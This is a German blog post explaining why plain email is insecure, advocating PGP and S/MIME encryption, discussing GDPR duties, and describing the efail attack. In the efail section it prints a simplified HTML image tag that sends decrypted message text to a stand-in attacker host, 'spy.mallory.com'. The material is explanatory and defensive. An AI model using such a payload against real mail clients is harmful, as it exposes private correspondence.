Weblog

The thruth about email security

28. August 2023

Die E-Mail ist historisch

Das Medium E-Mail ist fast so alt wie das Internet selbst. Genauer gesagt wurde E-Mail 1972 implementiert und schon genutzt, als das Internet noch „Arpanet“ hiess. Zum Zeitpunkt dieses Blogartikels ist das 46 Jahre her. Warum ist das erwähnenswert? Das Medium E-Mail wurde in seiner Struktur und grundlegenden Funktionsweise nie geändert. Es ist wichtig zu verstehen, dass die E-Mail vor 46 Jahren nicht vor die heutigen Herausforderungen gestellt war. Sicherheit, Datenschutz und diese absurde Menge an sensiblen Informationen, die über E-Mail ausgetauscht werden, sind ein modernes Problem, dem die E-Mail machtlos ausgeliefert ist. Und doch kommen wir von diesem Medium nicht weg, denn: E-Mail nutzt jeder.

Jeder könnte Ihre E-Mails gelesen haben

Die E-Mail, die Sie senden, wird so lange über verschiedene andere Computer weitergeleitet, bis sie im Postfach des Empfängers ange­kommen ist. Dabei verfügt die E-Mail selbst über keinen Schutz nach aussen, der es verhindert, dass jeder, der diese E-Mail weiterleitet diese auch lesen kann. Natürlich werden die E-Mails nicht über die Computer von Tante Emma oder Onkel Heinz weitergeleitet, sondern über E-Mail-Server, die im globalen Netzwerk dafür eingebunden wurden. Aber dennoch kann es sich dabei um 2, 5, 10 oder auch 50 Server handeln, die Ihre E-Mails empfangen und weiterleiten und zwischen diesen zwei Tätigkeiten die E-Mail, samt all Ihrer Anhänge, lesen, indexieren, auswerten und Kopien an Dritte weitersenden. Deshalb wird die E-Mail auch als „Postkarte des Internets“ bezeichnet.

Nehmen wir an Alice sendet Bob eine E-Mail. Sie schreibt diese auf Ihrem Computer, verbindet sich mit Ihrem E-Mail-Anbieter und die E-Mail wurde gesendet. Die Verbindung von Alice Computer bis zum E-Mail-Server ihres Anbieters ist via SSL verschlüsselt. Dabei handelt es sich um die Transportverschlüsselung, die ermöglicht, dass der Transfer von Alice zu ihrem E-Mail-Anbieter sicher transferiert wird, ohne dass Dritte einsehen können, was Alice an ihren Anbieter überträgt. Schon hier begibt sich Alice in das Vertrauen ihres E-Mail-Anbieters, denn dieser kann jetzt, nachdem die E-Mail zu ihm übertragen wurde, die E-Mail vollumfänglich lesen. Alice möchte aber ihrem Anbieter vertrauen und davon ausgehen, dass dieser als seriöser Anbieter nicht ihre E-Mails lesen oder weitergeben wird.

Fahren wir fort: Ihr Anbieter ist darum bemüht die E-Mail an Bob zuzustellen. Dafür wird sie an den Anbieter von Bob adressiert zum nächstbesten

Weiterleitungsserver gesendet mit der Bitte die E-Mail zu Bob zu bringen. Das Internet besteht aus Millionen solcher Weiterleitungsservern – ein vermaschtes Netzwerk. Dieser Weiterleitungsserver speichert die E-Mail und sendet sie weiter an den nächsten, damit dieser Bob die E-Mail zustellt.

Bereits ab dem ersten Weiterleitungsserver ist keine Transportverschlüsselung mehr gegeben. Die E-Mail liegt nun für die Möglichkeit des Abhörens offen. Doch das stört uns nicht so sehr wie die Tatsache, dass Alice vertrauenswürdiger E-Mail-Anbieter die E-Mail nicht an Bob, sondern an einen uns unbekannten Dritten weitergibt. Wer steckt dahinter? Ist der Anbieter des Weiterleitungsservers seriös? Sitzt er in unserem Land oder am anderen Ende der Welt? Ist dessen Server sicher gegen Hacker? Wir wissen es nicht.

Einfach so Emails verschicken ist wie eine Postkarte zu schreiben; jeder der sie mal in der Hand hatte, weiss was drauf steht. Nur nicht mit ein paar Postbeamten, sondern weltweit, vollautomatisiert und unlöschbar.

Die E-Mail wird nun über verschiedene Server weitergeleitet. Einer von Ihnen ist der Server von Mallory, unserem „Bösewicht“. Er sitzt in seinem Sessel und beobachtet den Internetverkehr, der über seinen Server läuft, wobei er nach interessanten Daten Ausschau hält. Dabei legt er von jeder eingehenden E-Mail eine Kopie an, speichert sie auf seinen Festplatten und leitet die E-Mail direkt zum nächsten Weiterleitungsserver weiter.

Die E-Mail kommt schliesslich auf dem Server von Bobs E-Mail-Anbieter an. Bob ruft diese über die sichere Verbindung via SSL von seinem Anbieter ab und liesst sie nun auf seinem Computer.

Der Versand der E-Mail kann bei jedem Versuch einen anderen Weg nehmen. Es ist daher nie gewährleistet, dass Alice E-Mails eine bestimmte Route gehen.

„Meine E-Mails sind nicht wichtig genug.“

Die Sicherheit der E-Mails wird häufig unterschätzt, weil es nicht greifbar ist. Einige Beispiele, die Ihre Vorstellungskraft anregen sollen:

    1. Identitätsdiebstahl: Sie senden Zugangsdaten zu einem Online-Shop mit E-Mail und Passwort via E-Mail. Ein Angreifer kann diese Daten mitlesen, sich mittels Ihrer Daten anmelden, Ihre dort eingegebenen Adress- und Zahlungsdaten auslesen sowie Bestellungen in Ihrem Namen an dritte Lieferanschriften – oder ggf. sogar Gutscheine digital – ausführen. Alternatives Szenario: Sie legen Ihren Reisepass in den Multi­funktions­drucker und lassen sich diesen von dort aus „bequem“ einscannen sowie via E-Mail zusenden. Diese E-Mail geht ebenso den weltweiten Weg und Ihr Reisepass liegt als Kopie verstreut auf der halben Welt. Kopien von Reisepässen werden unter anderem im „Darknet“ gehandelt, um damit eine fremde Identität vorzugeben.
    1. Social Engeneering: Sie senden eine E-Mail an Ihren Chef/Mitarbeiter mit der Bitte etwas auszuführen. Ein Angreifer kann Ihre E-Mails nutzen, um zu verstehen und zu re­kon­struieren, wie in Ihrem Unternehmen miteinander kommuniziert wird. Sodann kann er E-Mails unter Ihrem Namen oder unter dem Namen Ihres Chefs/Mitarbeiters schreiben. Spitznamen, Grussformeln, Anreden oder Schreibstile können so eine Manipulation ermöglichen Dinge zu tun, die Sie für einen Fremden nicht getan hätten. Der sogenannte CEO-Fraud wird so realisiert, in der Mitarbeiter der Buchhaltung vom „Chef“ gebeten werden Über­weisungen ins Ausland zu tätigen.
    1. Nachrichtenmanipulation: Da die Nachricht im Klartext bei den Servern ankommt, kann diese manipuliert weitergesendet werden. Nehmen Sie an Sie senden eine E-Mail mit Bitte um Zahlung auf Ihr Konto und der Angreifer wechselt die IBAN/BIC aus, bevor die E-Mail beim Empfänger ankommt. Es bleibt Ihre E-Mail aus Sicht des Empfängers.
    1. Angreifbar durch Hacker: Wo auch immer die E-Mail gespeichert wurde – ob bei Mallory oder einem „seriösen“ Weiter­leitungs­server – so ist es für Hacker denkbar einen Weiter­leitungs­server zu knacken und dort alle gespeicherten E-Mails auszulesen. So können auch noch über Jahre hinweg alte E-Mails beschafft und benutzt werden.
  1. Fehlende Anerkenntnis: Eine normale E-Mail gilt nicht als eine Nachricht, dessen Quelle nachweisbar ist. Jeder hätte diese Nachricht erfinden und zu­stellen können. So könnte auch jeder Ihrer E-Mail-Kommunikations­partner behaupten er habe diese E-Mail nicht gesendet.

Die Lösung: Asymetrische Kryptographie

Sie dürfen aufatmen: Sie müssen kein Ass in Mathe gewesen sein, um asymetrische Krypto­graphie zu nutzen. Diese Art der Verschlüsselung ermöglicht es E-Mails sicher zu versenden und alle obigen Herausforderungen zu lösen. Wie funktioniert asymetrische Kryptographie nun?

Asymetrische Kryptographie funktioniert so, dass es einen anderen Schlüssel zum Ver­schlüsseln als zum Ent­schlüsseln gibt. So kann Alice die Nachricht mittels Bobs öffentlichem Schlüssel so ver­schlüsseln, dass nur Bob diese Nachricht wiederum mit seinem privaten Schlüsseln öffnen kann.

Alice und Bob legen sich jeweils ein eigenes Schlüssel­paar mit einem öffentlichem sowie einem privaten Schlüssel an. Alice und Bob senden sich nun gegenseitig ihre öffentlichen

Schlüssel zu. Als nächstes nimmt Alice die E-Mail und verschlüsselt sie mit ihrem eigenen privaten Schlüssel sowie Bobs öffentlichem Schlüssel. Daraus resultiert eine E-Mail die nur mit Alice oder Bobs privatem Schlüssel gelesen werden kann. Weiterhin ist damit sicher­gestellt, dass Alice als Absender hervorgeht. Der An­greifer, Mallory, kann die E-Mail so nicht mehr einsehen oder fälschen, da ihm die privaten Schlüssel fehlen.­

Wie nutzen Sie nun Ver­schlüssel­ung in der Praxis?

Es ist unabdingbar für die verschlüsselte Kommuni­kation, dass Sie und Ihr Kommunikations­partner dasselbe Ver­schlüsselungs­verfahren verwenden. In der Praxis gibt es zwei Ver­fahren. Vorweg: Sie sind am besten aufgestellt, wenn Sie sich mit beidem beschäf­tigen und bei sich inte­grieren:

I‘m free, secure and available worldwide. Use me.

  • PGPPretty Good Privacy ist auch der Grundsatz, der sich hinter der Abkürzung verbirgt. PGP ist ein kostenfreies OpenSource-Verschlüsselungs­verfahren, welches dezentral fungiert. Aufgrund der Unab­hängigkeit von Zentra­lisierungen ist PGP eine klare Empfehlung.
  • S/MIME: Das S/MIME-Konzept folgt einem offiziellen Standard und basiert auf Zertifikaten, die von offiziellen Stellen (wie Commodo, VeriSign, etc.) ausgestellt werden. Die Schlüssel­vergabe sollte dabei unbedingt auf dem Rechner des Anwenders geschehen. Der Vorteil von S/MIME besteht in der breiteren Integrations­möglichkeit in E-Mail-Programmen und Mobil­telefonen sowie in der Möglichkeit Dokumente rechtssicher schriftlich per E-Mail versenden zu können, sofern ein Zertifikat der Klasse 3 bezogen wurde.­

Seit der NSA-Affären (Blogartikel aus 2014) gelten viele gängige Verschlüsselungsverfahren offiziell als nicht mehr sicher, da in verschiedenen Ebenen mut­masslich Hintertüren eingebaut wurden, die mindestens von Geheimdiensten genutzt werden.

In der Regel integrieren sich die Verfahren nach Erstinstallation automatisiert in den Ablauf; Nachrichten werden auto­matisch oder per Knopf­druck ver- und ent­schlüsselt.

Hinweis: Bei der Ver­schlüssel­ung via PGP und S/MIME werden nur der Inhalt (mit Anhängen), nicht aber die Meta-Daten verschlüsselt. Es bleiben weiterhin öffentlich: E-Mail des Empfängers, E-Mail des Absenders, Datum der Nachricht und Betreff. Achten Sie darauf keine personenbezogenen, sensiblen Daten in den Betreff zu schreiben.

PGP und S/MIME nutzen

S/MIME: Sie benötigen hierzu als allererstes ein Zertifikat. Sie erhalten ein kostenloses Klasse 1  oder Klasse 3 Zertifikat bei Comodo oder über Anbieter wie PSW.net. Die Anbieter liefern Ihnen bei Beantragung des Zertifikats eine Anleitung zur Installation.

PGP: Als Windows-Nutzer beziehen Sie OpenPGP oder Gpg4win. Sind Sie Macintosh-Nutzer, so steht Ihnen die GPG-Suite offen. Nach Installation erstellen Sie Ihr Schlüsselpaar.

Den öffentlichen Schlüssel können Sie an Ihre Kommunikationspartner versenden oder auf Ihrer Website zum Download anbieten. So kann jeder, der mit Ihnen schon von der ersten E-Mail an verschlüsselt kommunizieren möchte, sich vorab den öffentlichen Schlüssel herunterladen. Ansonsten wird üblicherweise in der ersten E-Mail der öffentliche Schlüssel mitgesendet,

sodass in einer zweiten E-Mail verschlüsselt gesendet werden kann. Die E-Mail-Programme verhalten sich hier sehr unterschiedlich. Das Apple iPhone Mail erfordert die manuelle Zertifikat-Installation bei S/MIME und läuft damit nicht ganz ohne zutun, ermöglicht jedoch von Haus aus das S/MIME-Verfahren.

Das Zertifikat oder den privaten Schlüssel auf das Mobiltelefon bekommen

Nach obiger Erläuterung werden Sie sich sicher nicht Ihre wertvollen Zertifikate und privaten Schlüssel unver­schlüsselt per E-Mail selbst zusenden, um sich diese auf dem Telefon zu installieren. Ihre Kommunikation wäre damit schon noch vor Beginn kompro­mittiert. Kopieren Sie die Zerti­fikate über Ihren Computer direkt per Kabel auf das Telefon.

PGP und S/MIME wurden doch geknackt?

Nein. Im April 2018 wurde die Sicherheitslücke efail bekannt: Ein zur Ausnutzung der PGP- und S/MIME-Integration verwendetes Verfahren, das ein erhebliches Risiko für die meisten PGP und S/MIME-Nutzer darstellt. Das Protokoll PGP und S/MIME hingegen sind nach wie vor intakt. Im folgenden Beispiel einer verschlüsselten E-Mail wird der gesamte Inhalt verschlüsselt und insgesamt entpackt:

Wie funktioniert efaiI? Das Konzept von efail baut auf der Integration der E-Mail-Klienten, die verschlüsselte E-Mails automatisch entschlüsseln. Soweit gibt es nichts einzuwenden, wäre da nicht auch noch HTML. Die Kombination automatischer Entschlüsselung sowie dem Ausführen von HTML-Code macht es mittels Modifizierung der Ursprungsnachricht möglich den Inhalt der

gesendeten E-Mail an den Angreifer zu übertragen. Was braucht der Angreifer dafür? Zu erst einmal muss der Angreifer Ihre verschlüsselte E-Mail mitgeschnitten und vorliegen haben. Diese E-Mail wird nun aufgeteilt und vor als auch nach dem verschlüsselten Teil werden jeweils ein weiterer HTML-Block hinzugefügt, der eine Grafik lädt. Ein vereinfachtes Beispiel:

<img src="http://spy.mallory.com/­
%%%MITPGP­VERSCHLÜSSELTENACHRICHT­: WZ4Ÿ&ÃÏWÃ4â2­ëö∂ñàŒÆ≈Ôfll’"5ÇOæÆ®06*­µ...%%%
"/>

Das Ergebnis ist, dass die Nachricht entschlüsselt und das HTML ausgeführt wird. Da die Nachricht innerhalb des Attributes „src“ einer Grafik aufgerufen wird, wandelt die E-Mail-Software 

diesen Text in ein URL-kodiertes Format um.
Ein Leerzeichen wird zu + oder ein Zeilenumbruch zu %2C konvertiert. Die folgende Grafik wird versuchen aufgerufen zu werden.

<img src="http://­spy.mallory.com­­/­Hallo+Bob­%2C%0A­­wir+treffen+uns+morgen­+um+20+Uhr­%21%0A­Viele+­Gr%C3%BC%C3%9Fe%0AAlice"­/>

Der Angreifer kann nun auf spy.mallory.com einen „Seiten-Aufruf“ sehen, der ihm Verrät: „Hallo Bob, wir treffen uns morgen um 20 Uhr! Viele Grüsse Alice„. Es ist somit allerdings notwendig, dass der Angreifer den Zugriff auf die verschlüsselte E-Mail verfügt, weiterhin Ihnen die E-Mail abgewandelt per E-Mail zustellt und Sie diese vom Angreifer abgewandelte E-Mail dann öffnen. Software-Lösungen wie GPG-Suite für Mac haben bereits an der Schließung dieser Sicherheitslücke gearbeitet.

Die Relevanz von E-Mail-Verschlüsselung für die DSGVO

Schon vorher hat das BDSG (Bundesdatenschutzgesetz) die E-Mail-Verschlüsselung empfohlen, indem personenbezogene Daten sicher zu übertragen sind. Seit der Einführung der DSGVO (Datenschutz-Grundverordnung) am 25. Mai 2018 wurden diese Richtlinien noch einmal verschärft und auf europäische Ebene gestellt. Auch wurden die Bussgelder auf ein empfindliches Mass angehoben: So sieht der Verstoss Strafen bis 20 Mio. Euro oder 4% des Jahres­umsatzes (des Mutter­konzerns) vor. Die Verschlüsselung von personenbezogenen Daten wird im Artikel 32 DSGVO vorgeschrieben, was auch die E-Mail-Verschlüsselung beinhaltet.

Mit obigem Wissen, dass alle unverschlüsselten E-Mails verstreut auf Servern von Anbietern, dessen Namen wir nicht kennen, noch einen Vertrag haben, in verschiedenen Ländern der Welt gespeichert werden und Zugriff auf unsere Daten haben, kommen wir zu dem Ergebnis, dass das Versenden einer personenbezogenen E-Mail ohne Verschlüsselung im geschäftlichen Umfeld per Konzept einem Datenschutz-Verstoss gleichkommt, da grob fahrlässig, wenn nicht sogar vorsätzlich, das Kopieren, Einsehen und Analysieren – das Kompromittieren – der personen­bezogenen Daten in Kauf genommen wird. 

Transportverschlüsselung (SSL) wird im aktuellen öffentlich Rechtsverständnis häufig als ausreichend betrachtet. Dies ist allerdings auf Basis der Erläuterungen in diesem Artikel nur auf fehlendes Verständnis des tatsächlichen technischen Ablaufs zurückzuführen.

Weiterhin sind Sie sogar mittels Artikel 33 und Artikel 34 der DSGVO verpflichtet Datenschutz­verletzungen der Aufsichts­behörde zu melden. Manche Rechts­auffassungen gehen hier auseinander und sagen, dass kein Eigen­verschulden stattgefunden hat, da sich ein Angreifer illegal Zugriff auf die Daten beschaffen müsste. Das kann aufgrund der Netzwerkstruktur nicht einmal bestätigt werden, denn Gesetze sind in jedem Land anders. Der Geheimdienst der USA, die NSA, verfügt mit PRISM über Systeme allen Daten­verkehr aufzuzeichnen, der mit ihnen in Berührung kommt. Der Zugriff ist in diesem Fall auf ameri­kanischem Raum legal, aber nicht auf Deutschem. Doch darum geht es bei der DSGVO nicht, denn Sie müssen verhindern, dass es überhaupt möglich ist, dass personenbezogene Daten verarbeitet werden könnten. Ähnliche Aktivitäten sind übrigens auch beim britischen GCHQ zu finden.

Fazit

E-Mails transportieren viel zu wichtige Daten, als Sie unverschlüsselt zu versenden. Hacker können Sie einsehen, verkaufen oder gegen Sie verwenden und sie sind nicht rechtens im Rahmen der DSGVO. Die einzige Lösung hierzu stellt die Verschlüsselung der E-Mail dar. 

Über den Autor

Patrick Beck

Ein erfahrener Unternehmer und Certified Ethical Hacker, der seit 18 Jahren erfolgreich mehrere Digitalagenturen führt. Seine Expertise erstreckt sich über Software-, Web- und App-Entwicklung, kombiniert mit einem reichen Schatz an technischem Wissen und einem starken Fokus auf innovative Cyber-Sicherheitslösungen. Mit einem tiefen Verständnis für die Dynamik der IT-Branche verbindet er technische Kompetenz mit unternehmerischer Vision.

       

Schreiben Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert